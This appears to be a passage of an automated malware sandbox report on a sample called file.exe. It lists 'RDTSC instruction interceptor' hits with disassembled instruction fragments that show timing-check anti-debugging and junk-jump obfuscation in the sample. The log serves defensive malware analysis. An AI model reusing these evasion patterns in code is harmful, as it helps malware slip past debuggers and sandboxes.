                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112AA61 second address: 112AA65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112AA65 second address: 112AA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112AAE7 second address: 112AAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131A9D second address: 1131AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2E044F25F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131AA9 second address: 1131AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131AAF second address: 1131B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007F2E044F25F6h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2E044F2609h 0x00000019 popad 0x0000001a push ebx 0x0000001b jmp 00007F2E044F25FEh 0x00000020 pop ebx 0x00000021 push ecx 0x00000022 jmp 00007F2E044F2607h 0x00000027 pop ecx 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11310D6 second address: 11310ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CCh 0x00000009 jbe 00007F2E050A57C6h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11310ED second address: 11310FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2E044F25FAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113135F second address: 1131364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113191C second address: 1131924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113314F second address: 1133153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133153 second address: 113318D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FDh 0x00000007 jnp 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E044F25FCh 0x00000014 pushad 0x00000015 jc 00007F2E044F25F6h 0x0000001b jmp 00007F2E044F25FEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113655E second address: 1136562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCFD second address: 113BD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AC7C second address: 113AC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AC82 second address: 113ACAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2E044F25FCh 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F2E044F25FBh 0x0000001a pop edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACAA second address: 113ACCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E050A57DEh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACCD second address: 113ACD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B168 second address: 113B172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E050A57C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B172 second address: 113B1A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E044F25F6h 0x00000008 jng 00007F2E044F25F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jmp 00007F2E044F2606h 0x0000001a pop ecx 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 pop edi 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B1A4 second address: 113B1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B1A9 second address: 113B1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B1AF second address: 113B1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F2E050A57C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B779 second address: 113B77E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BA0B second address: 113BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57D0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E8CD second address: 113E8D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143D09 second address: 1143D21 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F2E050A57CBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143D21 second address: 1143D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143D2C second address: 1143D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143D32 second address: 1143D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143D38 second address: 1143D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2E050A57C6h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107282 second address: 1107286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107286 second address: 110728C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110728C second address: 10E8476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2E044F2603h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jp 00007F2E044F260Fh 0x00000014 jp 00007F2E044F2609h 0x0000001a jmp 00007F2E044F2603h 0x0000001f nop 0x00000020 jmp 00007F2E044F25FEh 0x00000025 lea eax, dword ptr [ebp+1248BF82h] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F2E044F25F8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 or cl, FFFFFF8Ch 0x00000048 sub dword ptr [ebp+122D3834h], ebx 0x0000004e nop 0x0000004f jmp 00007F2E044F2603h 0x00000054 push eax 0x00000055 jmp 00007F2E044F2604h 0x0000005a nop 0x0000005b push 00000000h 0x0000005d push ecx 0x0000005e call 00007F2E044F25F8h 0x00000063 pop ecx 0x00000064 mov dword ptr [esp+04h], ecx 0x00000068 add dword ptr [esp+04h], 00000016h 0x00000070 inc ecx 0x00000071 push ecx 0x00000072 ret 0x00000073 pop ecx 0x00000074 ret 0x00000075 mov dword ptr [ebp+12464984h], edx 0x0000007b call dword ptr [ebp+122D1BE0h] 0x00000081 push eax 0x00000082 push edx 0x00000083 jne 00007F2E044F261Fh 0x00000089 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073E0 second address: 11073E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11074BB second address: 11074C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11074C2 second address: 11074C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110796A second address: 1107973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107973 second address: 1107977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107977 second address: 11079B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2E044F2602h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F2E044F2602h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jnl 00007F2E044F25F8h 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11079B6 second address: 11079C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11079C5 second address: 11079CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107BAE second address: 1107BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107BB2 second address: 1107BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107BB6 second address: 1107BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F2E050A57D0h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f jng 00007F2E050A57D4h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F2E050A57C6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107CE2 second address: 1107CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107CF5 second address: 1107D40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F2E050A57D3h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jns 00007F2E050A57CEh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F2E050A57CFh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0EB2 second address: 10B0ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F2E044F2600h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142F43 second address: 1142F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E050A57C6h 0x0000000a jnp 00007F2E050A57C6h 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11430BF second address: 11430FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2601h 0x00000009 jmp 00007F2E044F2602h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F2E044F25FEh 0x00000016 jbe 00007F2E044F25FCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11433C8 second address: 11433CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11433CE second address: 11433D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143530 second address: 114353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143694 second address: 11436D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F2E044F2608h 0x0000000d jl 00007F2E044F25F6h 0x00000013 jnp 00007F2E044F25F6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2E044F2601h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143840 second address: 1143846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143846 second address: 114384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114384F second address: 1143855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143855 second address: 1143859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114987D second address: 1149897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11482C0 second address: 11482F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F2E044F25FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2E044F2608h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11482F4 second address: 11482F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11482F8 second address: 11482FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148728 second address: 1148732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B3E second address: 1148B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B44 second address: 1148B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B4A second address: 1148B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B50 second address: 1148B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114912B second address: 1149174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E044F2602h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F2E044F2603h 0x0000000f je 00007F2E044F25F6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jmp 00007F2E044F2600h 0x0000001f pop esi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149174 second address: 114917A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D75F second address: 114D769 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E044F25F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D769 second address: 114D77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E050A57CCh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4F5C second address: 10C4F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D4D9 second address: 114D4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FB6D second address: 114FB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F6B3 second address: 114F6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007F2E050A57C6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F830 second address: 114F838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153812 second address: 1153854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CCh 0x00000007 jnc 00007F2E050A57CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F2E050A57F2h 0x00000015 pushad 0x00000016 jnc 00007F2E050A57C6h 0x0000001c jmp 00007F2E050A57CCh 0x00000021 jns 00007F2E050A57C6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153854 second address: 1153858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152F6A second address: 1152F90 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2E050A57D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152F90 second address: 1152F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E044F25F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11530D8 second address: 1153108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E050A57D9h 0x00000011 jne 00007F2E050A57C6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156BC2 second address: 1156BE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2E044F2604h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F3CA second address: 115F3F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2E050A57EEh 0x0000000f jmp 00007F2E050A57D2h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE03 second address: 115DE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2E044F25F6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E32F second address: 115E333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E333 second address: 115E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E33C second address: 115E344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108205 second address: 110821F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110821F second address: 1108225 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E5EE second address: 115E5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
